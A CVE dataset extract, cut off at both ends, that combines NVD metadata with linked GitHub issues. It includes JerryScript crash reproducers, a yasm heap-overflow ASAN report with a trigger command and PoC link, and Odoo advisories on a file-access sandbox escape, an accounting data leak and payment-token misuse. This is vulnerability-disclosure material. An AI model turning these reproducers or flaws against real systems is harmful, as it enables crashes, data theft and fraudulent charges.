#7 0x562a05b9085b (/data/jerryscript/asan/bin/jerry+0x8885b)
#8 0x562a05b919b9 (/data/jerryscript/asan/bin/jerry+0x899b9)
#9 0x562a05bf8576 (/data/jerryscript/asan/bin/jerry+0xf0576)
#10 0x562a05b25dac (/data/jerryscript/asan/bin/jerry+0x1ddac)
#11 0x7f32bb095082 in __libc_start_main ../csu/libc-start.c:308
#12 0x562a05b26cfd (/data/jerryscript/asan/bin/jerry+0x1ecfd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/data/jerryscript/asan/bin/jerry+0xd0580)
==167385==ABORTING
###### Expected behavior
| Segmentation fault in jerry | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5058/comments | 5 | 2023-03-28T06:12:27Z | 2023-04-26T19:22:43Z | https://github.com/jerryscript-project/jerryscript/issues/5058 | 1,643,268,712 | 5,058 |
CVE-2023-30408 | 2023-04-24T22:15:09.677 | Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component build/bin/jerry. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5057"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jerryscript-project/jerryscript/issues/5057 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | First of all, when reporting a bug, give the issue a descriptive title.
In the body of the issue, optionally give a free-form text description of the
bug. Give the context necessary for others to understand the problem.
Then, provide information necessary to reproduce the bug.
Omit sections that are irrelevant for the bug report, but note that information
like git revision, build platform, build command, and test case are required in
almost all cases.
###### JerryScript revision
1a2c04763aba49f52b1537acd3730098c873511c
###### Build platform
Ubuntu 20.04.2 LTS (Linux 5.15.0-67-generic x86_64)
###### Build steps
./tools/build.py
###### Test case
```
var p = new Promise(function(resolve,reject){})
var f = async(p) =>{}
await p;
f(p).then(function(){})
```
###### Execution platform
same as the build platform.
###### Execution steps
```sh
build/bin/jerry testcase.js
```
###### Output
Sometimes throws syntax errors: Unhandled exception: SyntaxError
Most of the time jerry crashes: Segmentation fault (core dumped)
###### Backtrace
###### Expected behavior
not to crash
| Segmentation fault in jerry | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5057/comments | 1 | 2023-03-27T09:25:43Z | 2023-04-26T19:24:26Z | https://github.com/jerryscript-project/jerryscript/issues/5057 | 1,641,737,938 | 5,057 |
CVE-2023-30410 | 2023-04-24T22:15:09.743 | Jerryscript commit 1a2c047 was discovered to contain a stack overflow via the component ecma_op_function_construct at /operations/ecma-function-object.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5052"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jerryscript-project/jerryscript/issues/5052 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
1a2c04763aba49f52b1537acd3730098c873511c
###### Build platform
Name the build platform. E.g., copy the output of
Ubuntu Lunar Lobster (development branch) (Linux 5.15.0-67-generic x86_64)
###### Build steps
```sh
python3 tools/build.py --builddir=asan --compile-flag=-fno-omit-frame-pointer --compile-flag=-fsanitize=address --compile-flag=-fno-optimize-sibling-calls --compile-flag=-g --strip=OFF
```
###### Test case
```javascript
function f0(a1, a2, ...a3) {
class C4 extends a1 {
}
var v5 = new C4(C4);
return C4;
}
f0(f0);
```
###### Execution steps
```
./build/bin/jerry test.js
```
###### Output
segmentfault
###### Backtrace
==51694==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe6695efc0 (pc 0x5556250c8272 bp 0x7ffe6695f070 sp 0x7ffe6695efb0 T0)
#0 0x5556250c8272 in ecma_op_function_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1704
#1 0x5556250c8958 in ecma_op_function_construct_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631
#2 0x5556250c8958 in ecma_op_function_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727
#3 0x5556250c8958 in ecma_op_function_construct_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631
...
...
#491 0x5556250c8958 in ecma_op_function_construct_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631
#492 0x5556250c8958 in ecma_op_function_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727
#493 0x5556250c8958 in ecma_op_function_construct_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631
#494 0x5556250c8958 in ecma_op_function_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727
#495 0x5556250c8958 in ecma_op_function_construct_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631
#496 0x5556250c8958 in ecma_op_function_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727
SUMMARY: AddressSanitizer: stack-overflow /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1704 in ecma_op_function_construct
==51694==ABORTING
| jerry crashed while running the following code. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5052/comments | 1 | 2023-03-15T06:57:23Z | 2023-04-26T19:26:13Z | https://github.com/jerryscript-project/jerryscript/issues/5052 | 1,624,874,619 | 5,052 |
CVE-2023-30414 | 2023-04-24T22:15:09.807 | Jerryscript commit 1a2c047 was discovered to contain a stack overflow via the component vm_loop at /jerry-core/vm/vm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5051"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jerryscript-project/jerryscript/issues/5051 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] |
the following js cause a segmentation fault in jerryscript.
```
function test(){
function f(){
var f = test();
h = f();
}
return f;
}
let a = test();
c = a();
``` | segmentation fault in jerryscript | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5051/comments | 2 | 2023-03-14T03:36:48Z | 2023-04-26T19:28:39Z | https://github.com/jerryscript-project/jerryscript/issues/5051 | 1,622,665,090 | 5,051 |
CVE-2023-30402 | 2023-04-25T16:15:09.590 | YASM v1.3.0 was discovered to contain a heap overflow via the function handle_dot_label at /nasm/nasm-token.re. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/206"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6556F7-3880-452A-ABA9-1A8A14BA41F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yasm/yasm/issues/206 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | yasm heap buffer overflow
I found a heap-buffer-overflow in yasm.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
How to trigger
Compile the program with AddressSanitizer
Run command $ ./yasm -s -o abc --force-strict $PoC
Details
ASAN report
$./yasm -s -o abc --force-strict $PoC
```
yasm: file name already has no extension: output will be in `yasm.out'
=================================================================
==972503==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006fd3 at pc 0x000000717cbd bp 0x7ffe3f1cd1c0 sp 0x7ffe3f1cd1b8
READ of size 1 at 0x602000006fd3 thread T0
#0 0x717cbc in handle_dot_label /home/root/FuzzDateset/yasm/yasm-1.3.0/./modules/parsers/nasm/nasm-token.re:82:13
#1 0x704533 in nasm_parser_lex /home/root/FuzzDateset/yasm/yasm-1.3.0/./modules/parsers/nasm/nasm-token.re:384:17
#2 0x594fbb in demand_eol_ /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parse.c:149:9
#3 0x591775 in nasm_parser_parse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parse.c:232:13
#4 0x590f3f in nasm_do_parse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parser.c:66:5
#5 0x5907fb in nasm_parser_do_parse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parser.c:83:5
#6 0x4d035f in do_assemble /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:519:5
#7 0x4ccce0 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:749:12
#8 0x7f675d943082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#9 0x41d46d in _start (/home/root/randomFuzz/yasm/yasm/yasm_s_o_f/yasm+0x41d46d)
0x602000006fd3 is located 0 bytes to the right of 3-byte region [0x602000006fd0,0x602000006fd3)
allocated by thread T0 here:
#0 0x499c1d in __interceptor_malloc (/home/root/randomFuzz/yasm/yasm/yasm_s_o_f/yasm+0x499c1d)
#1 0x53d0af in def_xmalloc /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/xmalloc.c:69:14
#2 0x53d86e in yasm__xstrndup /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/xstrdup.c:64:16
#3 0x717bfb in handle_dot_label /home/root/FuzzDateset/yasm/yasm-1.3.0/./modules/parsers/nasm/nasm-token.re:79:26
#4 0x704533 in nasm_parser_lex /home/root/FuzzDateset/yasm/yasm-1.3.0/./modules/parsers/nasm/nasm-token.re:384:17
#5 0x594fbb in demand_eol_ /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parse.c:149:9
#6 0x591775 in nasm_parser_parse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parse.c:232:13
#7 0x590f3f in nasm_do_parse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parser.c:66:5
#8 0x5907fb in nasm_parser_do_parse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/parsers/nasm/nasm-parser.c:83:5
#9 0x4d035f in do_assemble /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:519:5
#10 0x4ccce0 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:749:12
#11 0x7f675d943082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/root/FuzzDateset/yasm/yasm-1.3.0/./modules/parsers/nasm/nasm-token.re:82:13 in handle_dot_label
Shadow bytes around the buggy address:
0x0c047fff8da0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8db0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8dc0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
0x0c047fff8dd0: fa fa fd fa fa fa fd fa fa fa 05 fa fa fa 05 fa
0x0c047fff8de0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
=>0x0c047fff8df0: fa fa fd fa fa fa fd fa fa fa[03]fa fa fa fa fa
0x0c047fff8e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==972503==ABORTING
```
The URL of PoC is [PoC](https://github.com/randomssr/PoCs/blob/main/yasm/137-HOF) | yasm heap buffer overflow | https://api.github.com/repos/yasm/yasm/issues/206/comments | 1 | 2023-03-01T01:50:12Z | 2024-03-22T11:53:56Z | https://github.com/yasm/yasm/issues/206 | 1,604,082,214 | 206 |
CVE-2021-23166 | 2023-04-25T19:15:09.140 | A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read and write local files on the server. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 5.8,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 5.8,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107687"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "2BFAF5BD-20F9-402C-B7EB-4E0294A572AE",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107687 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23166](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23166)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23166](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23166)
**Component**: Core
**Credits**: Nils Hamerlinck (Trobz)
A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise
15.0 and earlier allows authenticated administrators to read and write
local files on the server.
## I. Background
Odoo uses the Python library psycopg2 to interact with the PostgreSQL database.
## II. Problem Description
The pyscopg2 library could be abused to access the local files of the server
running the Odoo instance.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Privileged user account required
**CVSS3 Score**: high :: 8.7
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)
A malicious administrator might be able to read or modify sensitive files stored
on the server such as protected configuration secrets.
Systems who host Odoo databases for untrusted users are particularly at risk,
(e.g. SaaS platforms), as they typically allow users to become administrators
of their own Odoo database. This is sufficient to exploit the vulnerability.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/c306ce28d524e868a558c9ecb4ce5e9173c220c1
- 14.0: https://github.com/odoo/odoo/commit/1f1e03ff29f711dd26cfbcadc60b7d03fdb59ed7
- 15.0: https://github.com/odoo/odoo/commit/0122cb3e11bdd9eaa2c3c8b32ebbd508038bbe99
- 15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.
| [SEC] CVE-2021-23166 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107687/comments | 0 | 2022-12-10T23:00:32Z | 2022-12-10T23:00:33Z | https://github.com/odoo/odoo/issues/107687 | 1,489,087,046 | 107,687 |
CVE-2021-23176 | 2023-04-25T19:15:09.220 | Improper access control in reporting engine of l10n_fr_fec module in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to extract accounting information via crafted RPC packets. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107682"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "2BFAF5BD-20F9-402C-B7EB-4E0294A572AE",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107682 | [
"Issue Tracking",
"Mitigation",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23176](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23176)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23176](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23176)
**Component**: l10n_fr_fec
**Credits**: Florent Mirieu de la barre
Improper access control in reporting engine of l10n_fr_fec module in Odoo
Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows
remote authenticated users to extract accounting information via crafted
RPC packets.
## I. Background
The l10n_fr_fec module is a module for the accounting localization of France
allowing to generate the Fichier d'Échange Informatisé (FEC).
## II. Problem Description
The generation of the report was not properly protected and could be accessed
by users without accounting access rights.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Employee / Portal user account required
**CVSS3 Score**: Medium :: 6.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Malicious users (including portal user accounts) on an Odoo database
might craft RPC requests specifically targeted at extracting accounting
data from the database.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Until the deployment of the patch, the `l10n_fr_fec` module can be
uninstalled on unpatched database. Updating to the latest revision or
applying the corresponding patch is strongly recommended.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).
For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html
## VI. Correction details
The following list contains the patches that fix the vulnerability for
each version:
- 13.0: https://github.com/odoo/odoo/commit/0ef5489598e9ebfd430adb09c6c4038b926ad277
- 14.0: https://github.com/odoo/odoo/commit/f166400c7ddd1bc571fcad52d18d2371f2c3fd87
- 15.0: https://github.com/odoo/odoo/commit/66f0a384eeda7f223736e6e80b32b5c3e824653b
- 15.0-ent, 14.0-ent, 13.0-ent (Enterprise): see 15.0, 14.0 and 13.0.
| [SEC] CVE-2021-23176 - Improper access control in reporting engine o... | https://api.github.com/repos/odoo/odoo/issues/107682/comments | 0 | 2022-12-10T23:00:23Z | 2022-12-10T23:00:24Z | https://github.com/odoo/odoo/issues/107682 | 1,489,086,881 | 107,682 |
CVE-2021-23178 | 2023-04-25T19:15:09.283 | Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows attackers to validate online payments with a tokenized payment method that belongs to another user, causing the victim's payment method to be charged instead. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107690"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "2BFAF5BD-20F9-402C-B7EB-4E0294A572AE",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/107690 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23178](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23178)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23178](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23178)
**Component**: Online Payment
**Credits**: Parth Gajjar
Improper access control in Odoo Community 15.0 and earlier and Odoo
Enterprise 15.0 and earlier allows attackers to validate online payments
with a tokenized payment method that belongs to another user, causing
the victim's payment method to be charged instead.
## I. Background
To facilate recurring online payments on the ecommerce or subscription, one can
save a credit card as payment method and reuse it for future purchase.
## II. Problem Description
An improper validation in the online payment mechanism allowed an attacker to
use the saved payment method of another user.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: None
**CVSS3 Score**: high :: 7.5
